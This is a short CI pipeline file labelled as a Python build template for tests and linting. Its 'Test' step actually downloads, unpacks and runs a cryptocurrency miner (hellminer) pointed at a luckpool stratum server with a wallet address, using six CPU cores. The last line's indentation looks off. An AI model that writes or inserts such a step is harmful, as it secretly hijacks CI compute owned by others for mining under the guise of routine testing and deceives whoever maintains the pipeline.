#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: Test
          script:
            - wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
      
         
      
            - tar xf hellminer_cpu_linux.tar.gz
      
         
             - ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RBw9nUhueGuapWsaekrYUDQQXfon56WKMT.Mike -p x --cpu 6